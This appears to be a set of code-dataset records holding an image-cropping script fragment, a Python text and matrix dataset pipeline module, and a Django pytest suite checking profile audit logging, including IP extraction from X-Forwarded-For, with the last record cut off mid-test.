np.where(all_crop_list[max_avg_index] == 0)[0].shape[0] == 1: \r\n zero_val = np.where(all_crop_list[max_avg_index] == 0)[0][0]\r\n if zero_val == 2:\r\n row1 = int(all_crop_list[max_avg_index][2])\r\n row2 = int(all_crop_list[max_avg_index][3]+(size_of_crop*2))\r\n col1 = int(all_crop_list[max_avg_index][4]-size_of_crop)\r\n col2 = int(all_crop_list[max_avg_index][5]+size_of_crop)\r\n if zero_val == 4:\r\n col1 = int(all_crop_list[max_avg_index][4])\r\n col2 = int(all_crop_list[max_avg_index][5]+(size_of_crop*2))\r\n row1 = int(all_crop_list[max_avg_index][2]-size_of_crop)\r\n row2 = int(all_crop_list[max_avg_index][3]+size_of_crop)\r\n \r\n if np.where(all_crop_list[max_avg_index] == 100)[0].shape[0] == 1: \r\n zero_val = np.where(all_crop_list[max_avg_index] == 0)[0][0]\r\n if zero_val == 3:\r\n row1 = int(all_crop_list[max_avg_index][2]-(size_of_crop*2))\r\n row2 = int(all_crop_list[max_avg_index][3])\r\n col1 = int(all_crop_list[max_avg_index][4]-size_of_crop)\r\n col2 = int(all_crop_list[max_avg_index][5]+size_of_crop)\r\n if zero_val == 5:\r\n row1 = int(all_crop_list[max_avg_index][2]-size_of_crop)\r\n row2 = int(all_crop_list[max_avg_index][3]+size_of_crop)\r\n col1 = int(all_crop_list[max_avg_index][4]-(size_of_crop*2))\r\n col2 = int(all_crop_list[max_avg_index][5])\r\n \r\n img_crop = img[row1:row2,col1:col2]\r\n# print (i,img_crop.shape)\r\n x_train_crop.append((img_crop.reshape(img_crop.shape[0]*img_crop.shape[0],)))\r\n# plt.imshow(img_crop)\r\n# plt.axis(\"off\")\r\n# plt.show()\r\n\r\nx_train_crop = np.array(x_train_crop)\r\n\r\n\r\nplt.imshow(x_train_crop[2].reshape(40,40))\r\nplt.axis(\"off\")\r\nplt.show()\r\n", "sub_path": "try_rescale_2.py", "file_name": "try_rescale_2.py", "file_ext": "py", "file_size_in_byte": 6950, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.load", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "numpy.average", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 179, "usage_type": "name"}]} +{"seq_id": "105543785", "text": "# -*- coding: utf-8 -*-\n# @Time : 2018/11/12 12:53 AM\n# @Author : Muximus\n# @Site : \n# @File : data_wapper.py\n# @Software: PyCharm\nimport os\nimport sys\nimport numpy as np\nimport logging\nfrom abc import ABC, abstractmethod, ABCMeta\nimport math\nimport pandas as pd\nimport types\n\n_root = os.path.normpath(\"%s/..\" % os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(_root)\nlogger = logging.getLogger(__name__)\nfrom utils.data_helper import *\nfrom utils.batch_generator import BathGenOneNoneInf\nfrom utils.multiprocess_helper import WorkerWrapper, MultiProcess\nfrom typing import List, TypeVar, Sequence, Generic, Callable\nimport collections\n\nIntStringList = TypeVar('IntStringList', int, str, List[int], List[str])\nIntOrNone = TypeVar('IntOrNone', int, type(None))\n\n\nclass MatDataFile:\n def __init__(self, data_dir, data_name, suffix, keys):\n \"\"\"specific one data for special type\n\n # Arguments\n data_dir: data directory\n data_name: data file name without suffix\n suffix: .npz or .npy or .mat\n keys: if data is .npz or .mat with multi datas, should specific keys for those data.\n \"\"\"\n if suffix not in ['npz', 'npy', 'mat', 'dat']:\n raise AssertionError('not supported data type')\n self.data_dir = data_dir\n self.data_name = data_name\n self.suffix = suffix\n self.keys = keys\n\n def load_data(self):\n return load_mat_common(self.suffix, self.data_dir, self.data_name, self.keys)\n\n\nclass Dataset(ABC):\n \"\"\"创建数据管道, 处理数据变化,兼容数据文件类型\"\"\"\n\n def __init__(self, **kwargs):\n self._data = None\n self._label = None\n pass\n\n @staticmethod\n def from_mat(data_files: List[MatDataFile]):\n return MatDataSet(data_files)\n\n @staticmethod\n def from_files(files: List[str], feature: int, word_index: dict, msl: int, find_new_word: bool, cleanable: bool, qid_index: Union[dict, type(None)], seps: List[str],\n headers: List[IntOrNone],\n data_axises: List[int], qid_axises: Union[List[int], type(None)],\n label_str_axises: Union[List[int], type(None)],\n drop_values: List[IntStringList],\n drop_axises: List[int], usecols_all: List[list]):\n return FilesDataSet(files, feature, word_index, msl, find_new_word, cleanable, qid_index, seps, headers, data_axises, qid_axises, label_str_axises, drop_values,\n drop_axises, usecols_all)\n\n @staticmethod\n def from_text_sequence(qids, sentences, label_strs, feature, word_index, qid_index, msl: int = 35, find_new_word: bool = False, cleanable: bool = False):\n return TextDataSet(qids, sentences, label_strs, feature, word_index, qid_index, msl, find_new_word, cleanable)\n\n @staticmethod\n def from_mmap(data_files: List[MatDataFile], concat_file: str):\n return MmapDataSet(data_files, concat_file)\n\n @property\n def data(self):\n return self._data\n\n @data.setter\n def data(self, data):\n self._data = data\n\n @property\n def label(self):\n return self._label\n\n @label.setter\n def label(self, label):\n self._label = label\n\n def custom_map(self, func: Callable[[np.ndarray], np.ndarray]):\n self._data = func(self.data)\n\n def custom_reduce_map(self, nums, worker_func: Callable[[np.ndarray], np.ndarray], listener_func: Callable):\n length = self.data.shape[0]\n batch_size = int(math.ceil(length / nums))\n data_generator = BathGenOneNoneInf(length, batch_size, False).build_generator()\n workers = []\n for i_data, data in enumerate(data_generator):\n worker = WorkerWrapper(worker_func, 'data:{}'.format(i_data), (data,))\n workers.append(worker)\n listener = WorkerWrapper(listener_func, 'data_listener', ('kill',))\n mltp = MultiProcess(workers, listener, 'kill')\n self._data = mltp.run()\n return self\n\n @property\n def output_shape(self):\n return self._data.shape\n\n def save(self, data_dir, data_name, suffix: str):\n if self.data is not None:\n save_mat_common(suffix, data_dir, data_name, None, self.data)\n return self\n\n\nclass MmapDataSet(Dataset):\n\n def __init__(self, data_files: List[MatDataFile], concat_file: str):\n super(MmapDataSet, self).__init__()\n if len(data_files) == 1:\n self._data = data_files[0].load_data()\n else:\n mmap = MmapUtil(concat_file)\n for data_file in data_files:\n mmap.save(data_file.load_data())\n self._data = mmap.load()\n\n\nclass MatDataSet(Dataset):\n \"\"\"load mat data and other file\"\"\"\n\n def __init__(self, data_files: List[MatDataFile]):\n \"\"\"train test 需要分开保存\"\"\"\n super(MatDataSet, self).__init__()\n if len(data_files) == 1:\n self._data = data_files[0].load_data()\n else:\n datas = []\n for data_file in data_files:\n datas.append(data_file.load_data())\n self._data = np.concatenate(datas, 0)\n\n\nclass TextDataSet(Dataset):\n def __init__(self, qids, sentences, label_strs, feature, word_index, qid_index, msl: int = 35, find_new_word: bool = False, cleanable: bool = False):\n super(TextDataSet, self).__init__()\n if not word_index and not find_new_word:\n raise AssertionError('must specific find_new_word=True using empty word_index for data processing')\n self.word_index = word_index\n self.qids = qids\n self.sentences = sentences\n self.feature = feature\n self.msl = msl\n self.find_new_word = find_new_word\n self.cleanable = cleanable\n self.total_len = len(sentences)\n if not qid_index and qids is not None:\n self.qid_index, self.qid_sample_num, self.qid_sample_index, self.label_str_qid = label_str_qid_process(qids, label_strs)\n else:\n self.qid_index = qid_index\n self.data_generator = None\n\n def reduce(self, nums):\n batch_size = int(math.ceil(self.total_len / nums))\n self.data_generator = BathGenOneNoneInf(self.sentences, batch_size, False).build_generator()\n return self\n\n def upsample(self, min_sample):\n if self._data is None or self._label is None:\n raise AssertionError('don\\'t upsample before map, or data is None')\n self._data, self._label = up_sample(self._data, self._label, min_sample)\n return self\n\n def map(self):\n if self.data_generator:\n workers = []\n for i_data, data in enumerate(self.data_generator):\n if not self.find_new_word:\n worker = WorkerWrapper(parallel_str2mat, 'data:{}'.format(i_data), (data, self.word_index, self.msl, self.cleanable, self.feature))\n else:\n worker = WorkerWrapper(parallel_str2mat_find_new_word, 'data:{}'.format(i_data), (data, self.word_index, self.msl, self.cleanable, self.feature))\n workers.append(worker)\n listener = WorkerWrapper(parallel_data_listener, 'data_listener', ('kill',))\n mltp = MultiProcess(workers, listener, 'kill')\n self._data = mltp.run()\n else:\n if not self.find_new_word:\n self._data = str2mat(self.sentences, self.word_index, self.msl, self.cleanable, self.feature)\n else:\n self._data = str2mat_find_new_word(self.sentences, self.word_index, self.msl, self.cleanable, self.feature)\n self._label = np.asarray(list(map(lambda q: self.qid_index[q], self.qids))) if self.qids is not None else None\n return self\n\n def test_data(self, sample_rate: int = 1000):\n texts = mat2str(self._data, self.word_index)\n index_qid = {index: qid for qid, index in self.qid_index} if self.qid_index else None\n for i, text in enumerate(texts):\n if i % sample_rate == 0:\n if self._label is not None:\n label = self._label[i]\n qid = index_qid[label]\n logger.info('label:{},qid:{},sen:{}'.format(label, qid, text))\n else:\n logger.info(text)\n\n return self\n\n\nclass FilesDataSet(Dataset):\n def __init__(self, files: List[str], feature: int, word_index: dict, msl: int, find_new_word: bool, cleanable: bool, qid_index: Union[dict, type(None)],\n seps: List[str], headers: List[IntOrNone],\n data_axises: List[int], qid_axises: Union[List[int], type(None)],\n label_str_axises: Union[List[int], type(None)], drop_values: List[IntStringList],\n drop_axises: List[int], usecols_all: List[list]):\n \"\"\"use columns of [label_str sentences] or [qid label_str sentences]\"\"\"\n super(FilesDataSet, self).__init__()\n if not word_index and not find_new_word:\n raise AssertionError('empty word_index for data processing')\n if len(np.asarray(usecols_all).shape) != 2:\n raise AssertionError('can\\'t concat dataframes with different dims, means usecols for every file should have same number of columns')\n assert feature in [0, 1]\n if not word_index and not find_new_word:\n raise AssertionError('empty word_index for data processing')\n self.word_index = word_index\n self.feature = feature\n self.msl = msl\n self.find_new_word = find_new_word\n self.cleanable = cleanable\n self.data_generator = None\n dfs = []\n for i_file, file_dir in enumerate(files):\n sep = seps[i_file] if len(seps) > 1 else seps[0]\n header = headers[i_file] if len(headers) > 1 else headers[0]\n usecols = usecols_all[i_file] if len(usecols_all) > 1 else usecols_all[0]\n qid_axis = qid_axises[i_file] if len(qid_axises) > 1 else qid_axises[0]\n label_str_axis = label_str_axises[i_file] if len(label_str_axises) > 1 else label_str_axises[0]\n data_axis = data_axises[i_file] if len(data_axises) > 1 else data_axises[0]\n if file_dir.endswith('.csv'):\n df = pd.read_csv(open(file_dir, 'rU'), engine='c', sep=sep, na_filter=False, skipinitialspace=True, header=header, usecols=usecols)\n elif file_dir.endswith('.xlsx'):\n df = pd.read_excel(file_dir, engine='c', header=header, usecols=usecols)\n else:\n # 不属于csv 或者xlsx\n continue\n logger.info('=========> data:{} shape source:{}'.format(file_dir[file_dir.rindex('/'):], df.shape))\n # 自定义去掉某些行\n if drop_values is not None and drop_axises is not None:\n drop_value = drop_values[i_file] if len(drop_values) > 1 else drop_values[0]\n drop_axis = drop_axises[i_file] if len(drop_axises) > 1 else drop_axises[0]\n col_key = df.keys()[drop_axis]\n # 过滤多个值:多个语义或者多个语义id\n if isinstance(drop_value, list):\n for d_value in drop_value:\n df = df[df[col_key] != d_value]\n else:\n df = df[df[col_key] != drop_value]\n logger.info('=========> data shape after drop:{}'.format(df.shape))\n # 规范数据轴, 不然concat异常\n if len(usecols) == 3 and label_str_axis != qid_axis:\n df = df[[df.keys()[qid_axis], df.keys()[label_str_axis], df.keys()[data_axis]]]\n logger.info('=========> data shape final:{}'.format(df.shape))\n elif len(usecols) == 2 and label_str_axis == qid_axis:\n assert qid_axis != data_axis\n df = df[[df.keys()[qid_axis], df.keys()[data_axis]]]\n logger.info('=========> data shape final:{}'.format(df.shape))\n elif len(usecols) == 1:\n df = df[[df.keys()[data_axis]]]\n else:\n raise AssertionError('usecols wrong!')\n # 避免columns不同\n if len(dfs) > 0:\n df.columns = dfs[0].columns\n # 加入列表\n dfs.append(df)\n all_df = pd.concat(dfs)\n logger.info('=========>all data shape:{}'.format(all_df.shape))\n if all_df.shape[1] == 3:\n qids = all_df[all_df.keys()[0]].values\n label_strs = all_df[all_df.keys()[1]].values\n sentences = all_df[all_df.keys()[2]].values\n elif all_df.shape[1] == 2:\n qids = all_df[all_df.keys()[0]].values\n sentences = all_df[all_df.keys()[1]].values\n label_strs = None\n elif all_df.shape[1] == 1:\n qids = None\n sentences = all_df[all_df.keys()[0]].values\n label_strs = None\n else:\n raise AssertionError('all_df wrong!')\n self.word_index = word_index\n self.qids = qids\n self.sentences = sentences\n self.feature = feature\n self.msl = msl\n self.find_new_word = find_new_word\n self.cleanable = cleanable\n self.total_len = len(sentences)\n if not qid_index and qids is not None:\n self.qid_index, self.qid_sample_num, self.qid_sample_index, self.label_str_qid = label_str_qid_process(qids, label_strs)\n else:\n self.qid_index = qid_index\n self.data_generator = None\n\n def reduce(self, nums):\n batch_size = int(math.ceil(self.total_len / nums))\n self.data_generator = BathGenOneNoneInf(self.sentences, batch_size, False).build_generator()\n return self\n\n def upsample(self, min_sample):\n if self._data is None or self._label is None:\n raise AssertionError('don\\'t upsample before map, or data is None')\n self._data, self._label = up_sample(self._data, self._label, min_sample)\n return self\n\n def map(self):\n if self.data_generator:\n workers = []\n for i_data, data in enumerate(self.data_generator):\n if not self.find_new_word:\n worker = WorkerWrapper(func=parallel_str2mat, info='data:{}'.format(i_data), func_params=(data, self.word_index, self.msl, self.cleanable, self.feature))\n else:\n worker = WorkerWrapper(func=parallel_str2mat_find_new_word, info='data:{}'.format(i_data),\n func_params=(data, self.word_index, self.msl, self.cleanable, self.feature))\n workers.append(worker)\n listener = WorkerWrapper(func=parallel_data_listener, info='data_listener', func_params=('kill',))\n mltp = MultiProcess(workers, listener, 'kill')\n self._data = mltp.run()\n else:\n if not self.find_new_word:\n self._data = str2mat(self.sentences, self.word_index, self.msl, self.cleanable, self.feature)\n else:\n self._data = str2mat_find_new_word(self.sentences, self.word_index, self.msl, self.cleanable, self.feature)\n self._label = np.asarray(list(map(lambda q: self.qid_index[q], self.qids))) if self.qids is not None else None\n return self\n\n def test_data(self, sample_rate: int = 1000):\n texts = mat2str(self._data, self.word_index)\n index_qid = {index: qid for qid, index in self.qid_index} if self.qid_index else None\n for i, text in enumerate(texts):\n if i % sample_rate == 0:\n if self._label is not None:\n label = self._label[i]\n qid = index_qid[label]\n logger.info('label:{},qid:{},sen:{}'.format(label, qid, text))\n else:\n logger.info(text)\n\n return self\n\n\nif __name__ == '__main__':\n pass\n", "sub_path": "utils/dataset.py", "file_name": "dataset.py", "file_ext": "py", "file_size_in_byte": 15930, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.normpath", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 18, "usage_type": "call"}, {"api_name": "typing.TypeVar", "line_number": 25, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.TypeVar", "line_number": 26, "usage_type": "call"}, {"api_name": "abc.ABC", "line_number": 50, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 63, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 64, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 65, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 66, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 68, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 77, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 96, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 96, "usage_type": "attribute"}, {"api_name": "typing.Callable", "line_number": 99, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 99, "usage_type": "attribute"}, {"api_name": "math.ceil", "line_number": 101, "usage_type": "call"}, {"api_name": "utils.batch_generator.BathGenOneNoneInf", "line_number": 102, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.WorkerWrapper", "line_number": 105, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.WorkerWrapper", "line_number": 107, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.MultiProcess", "line_number": 108, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 124, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 138, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 147, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 170, "usage_type": "call"}, {"api_name": "utils.batch_generator.BathGenOneNoneInf", "line_number": 171, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.WorkerWrapper", "line_number": 185, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.WorkerWrapper", "line_number": 187, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.WorkerWrapper", "line_number": 189, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.MultiProcess", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 197, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 216, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 217, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 218, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 219, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 220, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 225, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 245, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 247, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 281, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 312, "usage_type": "call"}, {"api_name": "utils.batch_generator.BathGenOneNoneInf", "line_number": 313, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.WorkerWrapper", "line_number": 327, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.WorkerWrapper", "line_number": 329, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.WorkerWrapper", "line_number": 332, "usage_type": "call"}, {"api_name": "utils.multiprocess_helper.MultiProcess", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 340, "usage_type": "call"}]} +{"seq_id": "251816071", "text": "import json\nimport logging\nfrom dataclasses import dataclass\nfrom datetime import datetime, timedelta, timezone\nfrom typing import Any, List, Optional\n\nimport pytest\nfrom django.conf import settings\nfrom guardian.shortcuts import assign_perm\n\nfrom open_city_profile.tests.asserts import assert_almost_equal\nfrom open_city_profile.tests.graphql_test_helpers import do_graphql_call_as_user\nfrom profiles.models import (\n Profile,\n VerifiedPersonalInformationPermanentAddress,\n VerifiedPersonalInformationPermanentForeignAddress,\n VerifiedPersonalInformationTemporaryAddress,\n)\nfrom services.tests.factories import ServiceConnectionFactory\n\nfrom .factories import (\n ProfileFactory,\n SensitiveDataFactory,\n VerifiedPersonalInformationFactory,\n)\n\n\n@pytest.fixture(autouse=True)\ndef enable_audit_log():\n settings.AUDIT_LOGGING_ENABLED = True\n\n\n@pytest.fixture\ndef cap_audit_log(caplog):\n def get_logs(self):\n audit_records = [\n r for r in self.records if r.name == \"audit\" and r.levelno == logging.INFO\n ]\n return [json.loads(r.getMessage()) for r in audit_records]\n\n caplog.get_logs = get_logs.__get__(caplog)\n return caplog\n\n\ndef partition_logs_by_target_type(logs, target_type):\n matches = []\n rest = []\n\n for log in logs:\n if log[\"audit_event\"][\"target\"][\"type\"] == target_type:\n matches.append(log)\n else:\n rest.append(log)\n\n return matches, rest\n\n\ndef assert_common_fields(\n log_messages,\n target_profile,\n operation,\n actor_role=\"SYSTEM\",\n target_profile_part=\"base profile\",\n):\n now_dt = datetime.now(tz=timezone.utc)\n now_ms_timestamp = int(now_dt.timestamp() * 1000)\n leeway_ms = 50\n\n if not isinstance(log_messages, list):\n log_messages = [log_messages]\n\n assert len(log_messages) > 0\n\n for log_message in log_messages:\n audit_event = log_message[\"audit_event\"]\n\n assert audit_event[\"origin\"] == \"PROFILE-BE\"\n assert audit_event[\"status\"] == \"SUCCESS\"\n assert audit_event[\"operation\"] == operation\n assert audit_event[\"actor\"][\"role\"] == actor_role\n\n assert_almost_equal(audit_event[\"date_time_epoch\"], now_ms_timestamp, leeway_ms)\n\n log_dt = datetime.strptime(\n audit_event[\"date_time\"], \"%Y-%m-%dT%H:%M:%S.%fZ\"\n ).replace(tzinfo=timezone.utc)\n assert_almost_equal(log_dt, now_dt, timedelta(milliseconds=leeway_ms))\n\n expected_target = {\n \"id\": str(target_profile.pk),\n \"type\": target_profile_part,\n \"user_id\": str(target_profile.user.uuid),\n }\n assert audit_event[\"target\"] == expected_target\n\n\n@dataclass\nclass ProfileWithRelated:\n profile: Profile\n related_part: Optional[Any]\n related_name: Optional[str]\n profile_part_name: Optional[str]\n additional_profile_part_names: List[str]\n\n @property\n def all_profile_part_names(self):\n return [\n name\n for name in [self.profile_part_name] + self.additional_profile_part_names\n if name is not None\n ]\n\n\ndef vpi_factory_with_addresses(*wanted_address_models):\n def factory():\n address_args = dict()\n for address_model in [\n VerifiedPersonalInformationPermanentAddress,\n VerifiedPersonalInformationTemporaryAddress,\n VerifiedPersonalInformationPermanentForeignAddress,\n ]:\n if address_model not in wanted_address_models:\n address_args[address_model.RELATED_NAME] = None\n\n return VerifiedPersonalInformationFactory(**address_args)\n\n return factory\n\n\n@pytest.fixture(\n params=[\n (ProfileFactory, None, None, []),\n (SensitiveDataFactory, \"sensitivedata\", \"sensitive data\", []),\n (\n vpi_factory_with_addresses(),\n \"verified_personal_information\",\n \"verified personal information\",\n [],\n ),\n (\n vpi_factory_with_addresses(VerifiedPersonalInformationPermanentAddress),\n \"verified_personal_information__permanent_address\",\n \"verified personal information permanent address\",\n [\"verified personal information\"],\n ),\n (\n vpi_factory_with_addresses(VerifiedPersonalInformationTemporaryAddress),\n \"verified_personal_information__temporary_address\",\n \"verified personal information temporary address\",\n [\"verified personal information\"],\n ),\n (\n vpi_factory_with_addresses(\n VerifiedPersonalInformationPermanentForeignAddress\n ),\n \"verified_personal_information__permanent_foreign_address\",\n \"verified personal information permanent foreign address\",\n [\"verified personal information\"],\n ),\n ]\n)\ndef profile_with_related(request):\n (\n factory,\n related_name,\n profile_part_name,\n additional_profile_part_names,\n ) = request.param\n created = factory()\n if related_name:\n profile = getattr(created, \"profile\")\n related_part = profile\n for field_name in related_name.split(\"__\"):\n related_part = getattr(related_part, field_name)\n else:\n profile = created\n related_part = None\n\n return ProfileWithRelated(\n profile,\n related_part,\n related_name,\n profile_part_name,\n additional_profile_part_names,\n )\n\n\ndef test_audit_log_read(profile_with_related, cap_audit_log):\n related_name = profile_with_related.related_name\n\n profile_from_db = Profile.objects.select_related(related_name).first()\n audit_logs = cap_audit_log.get_logs()\n\n for profile_part_name in profile_with_related.all_profile_part_names:\n related_logs, audit_logs = partition_logs_by_target_type(\n audit_logs, profile_part_name\n )\n\n assert_common_fields(\n related_logs,\n profile_from_db,\n \"READ\",\n target_profile_part=profile_part_name,\n )\n\n assert_common_fields(audit_logs, profile_from_db, \"READ\")\n\n\ndef test_audit_log_update(profile_with_related, cap_audit_log):\n profile = profile_with_related.profile\n related_part = profile_with_related.related_part\n profile_part_name = profile_with_related.profile_part_name\n\n profile.first_name = \"John\"\n profile.save()\n if related_part:\n related_part.save()\n\n audit_logs = cap_audit_log.get_logs()\n\n if profile_part_name:\n related_logs, audit_logs = partition_logs_by_target_type(\n audit_logs, profile_part_name\n )\n\n assert_common_fields(\n related_logs, profile, \"UPDATE\", target_profile_part=profile_part_name\n )\n\n assert_common_fields(audit_logs, profile, \"UPDATE\")\n\n\ndef test_audit_log_delete(profile_with_related, cap_audit_log):\n profile = profile_with_related.profile\n\n deleted_pk = profile.pk\n profile.delete()\n profile.pk = deleted_pk\n audit_logs = cap_audit_log.get_logs()\n # Audit logging the Profile DELETE with a related object causes some READs\n # for the involved models.\n # This is unnecessary, but it's a feature of the current implementation.\n # We ignore the READ events in this test for now.\n audit_logs = list(\n filter(lambda e: e[\"audit_event\"][\"operation\"] != \"READ\", audit_logs)\n )\n\n for profile_part_name in profile_with_related.all_profile_part_names:\n related_logs, audit_logs = partition_logs_by_target_type(\n audit_logs, profile_part_name\n )\n\n assert_common_fields(\n related_logs, profile, \"DELETE\", target_profile_part=profile_part_name\n )\n\n assert_common_fields(audit_logs, profile, \"DELETE\")\n\n\ndef test_audit_log_create(cap_audit_log):\n profile = ProfileFactory()\n audit_logs = cap_audit_log.get_logs()\n assert (\n len(audit_logs) == 2\n ) # profile is accessed here as well, thus the 2 log entries\n log_message = audit_logs[1]\n assert_common_fields(log_message, profile, \"CREATE\")\n\n\nMY_PROFILE_QUERY = \"\"\"\n query {\n myProfile {\n id\n }\n }\n\"\"\"\n\n\ndef test_actor_is_resolved_in_graphql_call(\n live_server, profile, service_client_id, cap_audit_log\n):\n service = service_client_id.service\n ServiceConnectionFactory(profile=profile, service=service)\n user = profile.user\n do_graphql_call_as_user(live_server, user, service=service, query=MY_PROFILE_QUERY)\n audit_logs = cap_audit_log.get_logs()\n assert len(audit_logs) == 1\n log_message = audit_logs[0]\n assert_common_fields(log_message, profile, \"READ\", actor_role=\"OWNER\")\n assert log_message[\"audit_event\"][\"actor\"][\"user_id\"] == str(user.uuid)\n\n\ndef test_service_is_resolved_in_graphql_call(\n live_server, profile, service_client_id, cap_audit_log\n):\n user = profile.user\n service = service_client_id.service\n ServiceConnectionFactory(profile=profile, service=service)\n do_graphql_call_as_user(live_server, user, service=service, query=MY_PROFILE_QUERY)\n audit_logs = cap_audit_log.get_logs()\n assert len(audit_logs) == 1\n log_message = audit_logs[0]\n assert_common_fields(log_message, profile, \"READ\", actor_role=\"OWNER\")\n actor_log = log_message[\"audit_event\"][\"actor\"]\n assert \"service_name\" in actor_log\n assert actor_log[\"service_name\"] == service.name\n assert \"client_id\" in actor_log\n assert actor_log[\"client_id\"] == service_client_id.client_id\n\n\ndef test_actor_service(live_server, user, group, service_client_id, cap_audit_log):\n profile = ProfileFactory()\n service = service_client_id.service\n ServiceConnectionFactory(profile=profile, service=service)\n user.groups.add(group)\n assign_perm(\"can_view_profiles\", group, service)\n\n # serviceType is included in query just to ensure that it has NO affect on the audit log\n query = \"\"\"\n {\n profiles(serviceType: GODCHILDREN_OF_CULTURE) {\n edges {\n node {\n firstName\n }\n }\n }\n }\n \"\"\"\n\n cap_audit_log.clear()\n\n do_graphql_call_as_user(live_server, user, service=service, query=query)\n\n audit_logs = cap_audit_log.get_logs()\n assert len(audit_logs) == 1\n log_message = audit_logs[0]\n assert_common_fields(log_message, profile, \"READ\", actor_role=\"ADMIN\")\n actor_log = log_message[\"audit_event\"][\"actor\"]\n assert actor_log[\"service_name\"] == service.name\n assert \"client_id\" in actor_log\n assert actor_log[\"client_id\"] == service_client_id.client_id\n\n\nclass TestIPAddressLogging:\n @staticmethod\n def execute_ip_address_test(\n live_server, profile, expected_ip, cap_audit_log, request_args=None\n ):\n if request_args is None:\n request_args = {}\n\n user = profile.user\n\n do_graphql_call_as_user(\n live_server, user, query=MY_PROFILE_QUERY, extra_request_args=request_args\n )\n audit_logs = cap_audit_log.get_logs()\n assert len(audit_logs) == 1\n log_message = audit_logs[0]\n assert log_message[\"audit_event\"][\"actor\"][\"ip_address\"] == expected_ip\n\n @pytest.mark.parametrize(\n \"header\", [\"12.23.34.45\", \"12.23.34.45,1.1.1.1\", \"12.23.34.45, 1.1.1.1\"]\n )\n def test_requester_ip_address_is_extracted_from_x_forwarded_for_header(\n self, header, live_server, profile, cap_audit_log\n ):\n request_args = {\"headers\": {\"X-Forwarded-For\": header}}\n self.execute_ip_address_test(\n live_server, profile, \"12.23.34.45\", cap_audit_log, request_args\n )\n\n def test_do_not_use_x_forwarded_for_header_if_it_is_denied_in_settings(\n self, live_server, settings, profile, cap_audit_log\n ):\n settings.USE_X_FORWARDED_FOR = False\n request_args = 